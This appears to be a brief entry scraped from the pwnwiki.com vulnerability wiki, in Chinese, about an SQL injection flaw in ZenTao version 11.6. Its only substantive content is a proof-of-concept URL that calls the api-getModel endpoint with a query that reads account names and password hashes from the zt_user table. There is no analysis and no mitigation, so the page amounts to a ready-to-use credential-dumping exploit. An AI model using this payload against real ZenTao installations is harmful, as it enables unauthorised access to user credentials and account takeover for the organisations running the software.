Loading
0

禅道 11.6版本 SQL注入漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

POC

http://xxx.xxx.xxx.xxx/api-getModel-api-sql-sql=select+account,password+from+zt_user

免费、自由、人人可编辑的漏洞库